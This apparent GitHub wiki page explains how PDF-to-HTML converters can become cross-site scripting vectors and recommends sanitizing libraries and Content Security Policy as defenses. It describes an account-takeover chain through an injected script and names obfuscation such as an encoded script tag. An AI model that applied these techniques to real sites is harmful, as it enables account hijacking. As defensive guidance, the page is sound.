Skip to content

Protecting PDF2HTML from Cross Site Scripting

Stephen A Thomas edited this page Nov 25, 2013 · 2 revisions

In most common deployment, tools that convert PDF files to HTML content can expose a vector for cross site scripting attacks. This document briefly explains that attack vector and outlines some approaches to protecting against the attacks.

Cross Site Scripting Attacks

Web sites may be vulnerable to cross site scripting (XSS) attacks whenever they accept user supplied content that is later rendered as HTML for other users. If a vulnerability exists, then malicious users (i.e. an attacker) can include active content (e.g. JavaScript) in their contributions. When other users (i.e. a victim) view that content, the included script executes and performs malicious actions within the context of those other users.

The classic XSS example is a simple comment form:

If the web server naively accepts the contents of the <textarea> and renders them as HTML in the page, an attacker can embed a JavaScript reference:

When the victim later views the post and its comments, the browser will load and execute badscript.js, and that script will have full access to the victim's environment. With that access, the script could, for example, change the victim's registered email address to one that the attacker controls and then request a password reset, giving the attacker complete control over the victim's account.

PDF2HTML as an XSS Vector

Tools that convert PDF files to HTML represent a more complex form of the classic comment form attack vector. A (potentially malicious) user supplies content in the form of a PDF file. The tool converts the contents of that file into HTML, and other users who view the rendered HTML could become victims of an XSS attack.

PDF2HTML tools are more complex than simple comment forms because the transformation from user-supplied content to rendered output is complicated. The potential for such attacks, however, remains. Exploits against PDF2HTML tools might include:

  • Including <script> tags in the PDF content. Most PDF2HTML tools are likely to detect and "HTML-escape" the obvious <script> tags in the standard PDF content. There are, however, at least 70 different ways to obfuscate the <script> tag, not all of which may be detected by the PDF2HTML application. (A trivial example of such obfuscation is %3cscript%3e.)

  • Referencing External Content. PDF files include a mechanism for referencing external content (much like the HTML <img> tag). Depending on how the PDF2HTML tool converts those external references to HTML, it may be possible for an attacker to use such a reference to create an external HTML link to attack code.

  • PDF Meta Data. PDF files contain information that is not strictly content; however, various PDF2HTML tools may attempt to render such meta data as HTML tags. Depending on the specific tool, that feature may let attackers execute XSS attacks by carefully crafting PDF meta data.

  • Defects in the PDF2HTML Tool. The PDF2HTML tools are themselves software applications, and as such they may include defects. Such defects could allow an attacker to craft specific PDF content that would circumvent any XSS protections in the PDF2HTML code. Buffer overflows are classic examples of such exploits.

Sanitizing PDF2HTML Output

One method to protect against XSS attacks against PDF2HTML tools is to "sanitize" the HTML content that the tool generates before rendering it in (or even delivering it to) the browser. Servers based on Node.js, for example could pass the HTML output through one of the following two libraries:

Of course, those tools may themselves have exploitable defects, but the extra layer of protection they add is significant. It is also noteworthy that the foundation for the latter tool was developed by security experts at Google specifically to protect against XSS (and other) web-based attacks.

Content Security Policy

The ultimate protection against cross site scripting (regardless of the attack vector) is for the web site to implement Content Security Policy (CSP). As of this writing, browser support for CSP is not universal, so it would be premature to rely exclusively on CSP. Also, CSP places some significant constraints on the normal content that a web site delivers, so migrating a web site to CSP may be a non-trivial task. CSP can be enabled in a "report only" mode, however. Sites that intend to deploy CSP eventually may see substantial benefit in using this mode for an interim period to identify required changes to their content. This interim period can be useful even without universal browser support for the policy.